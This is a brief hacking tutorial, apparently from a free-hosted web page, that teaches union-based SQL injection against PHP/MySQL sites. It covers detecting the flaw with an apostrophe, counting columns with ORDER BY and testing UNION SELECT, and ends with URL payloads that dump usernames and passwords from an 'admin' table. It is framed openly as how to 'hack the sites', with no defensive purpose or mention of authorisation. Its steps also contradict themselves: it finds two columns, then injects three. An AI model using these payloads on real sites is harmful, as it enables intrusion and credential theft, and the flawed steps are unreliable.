SQL INJECTION

 

 

Now we are going to learn how to hack the sites which is vulnerable to Sql injection.So lets begin

 

To check if the site is vulnerable to Sql injection first check the url if it is like this

www.site.com/file.php?id=7

 

 

To check the vulnerbility type appostrophy at the end of url so it will become like this

 

www.site.com/file.php?id=7'

 

On hitting enter if you see this text on page

 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc.

 

Then the website is vulnerable to this attack

 

 

FINDING THE COLUMNS

 

 

To find number of columns we use statement ORDER BY (tells database how to order the result). In order to use, we do increment until we get an error.

 

http://www.site.com/news.php?id=7 order by 1 -- no error

 

http://www.site.com/news.php?id=7 order by 2 -- no error

 

http://www.site.com/news.php?id=7 order by 3 – error

 

so it means the site has 2 columns because we got error on 3th one.

 

 

 

CHECKING FOR UNION FUNCTION

 

 

Our next is step is to check for union function. This is because with union function we can select more data in one statement only.

 

http://www.site.com/news.php?id=7 union all select 1,2

 

Till 2 because we discoverd the no of column was 2 so lets move on

 

If we see some numbers on screen, i.e. 1 or 2  that means the UNION works

 

 

 

GETTING TABLE AND COLUMN NAME

 

 

This is for MySQL version less than 5

http://www.site.com/news.php?id=7 union all select 1,2,3 from admin

 

We see number 2 on the screen like before. Now we know that table admin exists. Now to check column names we craft a query

http://www.site.com/news.php?id=7 union all select 1,2,username from admin

 

We get username displayed on screen

Now to check for the column password

http://www.site.com/news.php?id=7 union all select 1,2,password from admin

 

If we got successful, we will see password on the screen. It can be in plain text or hash depending on how the database has been setup ?. Now we must complete the query. For that we can use concat() function (it joins strings

http://www.site.com/news.php?id=7 union all select 1,2,concat(username,0x3a,password)from admin

Note that we put 0x3a, its hex value for so 0x3a is hex value for colon

 

Now we get displayed username: password on screen

 

 

 

 

 

 

www.000webhost.com